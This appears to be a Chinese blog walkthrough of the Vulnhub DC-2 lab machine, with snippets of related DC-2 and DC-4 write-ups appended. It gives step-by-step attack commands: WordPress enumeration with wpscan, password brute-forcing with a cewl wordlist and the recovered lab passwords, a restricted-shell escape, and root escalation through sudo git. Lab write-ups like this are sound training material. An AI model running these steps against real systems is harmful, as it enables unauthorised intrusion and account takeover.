Vulnhub靶機實戰 DC 2

2022-10-08 19:09:11 字數 2605 閱讀 4504

描述:靶機dc-2共有5個flag,最終需要root許可權

才可以找到並檢視flag

環境:vmware虛擬機器軟體

1.檢視ip

nmap -sp 192.168.1.0/24    檢視ip

nmap -a 192.168.1.146     #這裡我的靶機ip是146

2.瀏覽器訪問

,發現無法正常訪問頁面,但在url位址列會有http://dc-2

網域名稱提示,發現問題是本地無法解析網域名稱dc-2

4.新增網域名稱解析後,可以正常訪問網頁資訊,並能在flag頁面找到flag1

提示使用cewl密碼字典生成工具,並且在登入後可以找到下乙個flag

5.flag1提示可以登入,但正常訪問網頁無法找到登入頁面,所以使用nikto工具掃瞄**結構,找到wp-login.php登入頁面

6.訪問登入頁面:http://dc-2/wp-login.php

7.使用wpscan工具掃瞄**,獲取可以登入**的使用者名稱,掃瞄後可以找到三個使用者名稱:admin、tom、jerry

8.將掃瞄到的三個使用者名稱新增到dc-2users.list

vim dc-2users.list

admin

tomjerry

9.使用flag1中提示的工具cewl生成密碼字典dc-2.dic

cewl dc-2 -w dc-2.dic

cat dc-2.dic

10.使用wpscan工具爆破可以登入使用者的密碼,可成功爆破tom和jerry使用者,密碼為:

jerry / adipiscing

tom / parturient

wpscan --url dc-2 -u dc-2users.list -p dc-2.dic
11.用ssh對其中乙個進行連線,輸入密碼

ssh [email protected] -p 7744

bash_cmds[a]=/bin/sh;a  #呼叫/bin/sh命令直譯器

export path=$path:/bin/ #使用bash命令直譯器

export path=$path:/usr/bin #設定環境變數

找到flag3

切換到jerry使用者找到flag4

flag4 提示我們可以使用git,我們可以通過git來提權

sudo -l    #檢視可以使用root許可權無密碼的命令,有git命令

sudo git -p help #提權

然後彈出一堆東西最後是個冒號,我們在冒號後面輸入

! /bin/bash
然後就到了root使用者再輸入id ,whoami檢視自己的成果!

whoami   #檢視當前使用者

passwd root #修改root密碼

123456 #密碼修改為:123456

su root #切換到root使用者

cd /root #進入到root家目錄下

ls #找到final-flag.txt

找到5個flag檔案,並提權成功!

Vulnhub靶機實戰(二) DC 2

開始拿flag 肯定是要先掃瞄ip了,依舊是使用nmap 只掃瞄到了80埠,瀏覽器開啟頁面來進一步收集資訊,頁面上已經說明了這是乙個wordpress站點。直接可以得到乙個flag 找不到有用資訊了,用wpscan掃瞄一下吧簡要介紹一下,wpscan是一款針對wordpress的安全掃瞄軟體 wps...

滲透實戰 滲透測試實戰 DC 2 靶機入侵

dc 2 靶機實戰 啟動dc 2 配置其網路為nat,檢視其mac 位址,重啟dc 2 使其網路配置生效 使用nmap 掃瞄內網網段 得到dc 2 的ip位址192.168.1.162 對其進行資訊收集 訪問其ip 連線失敗 新增本地dns解析 再訪問該 解析成功 cewl 工具 cewl dc 2...

Vulnhub實戰靶場 DC 4

一 環境搭建 3 為了正常練習,將靶場的網絡卡模式設定為橋接模式,啟動即可 二 靶場攻略 2 使用命令 nmap a p 192.168.1.7,尋找突破口,發現開啟80和22埠 4 得到乙個命令執行的地方 可以檢視檔案 再次使用burpsuite抓包,通過修改radio引數,可以執行系統命令 5 ...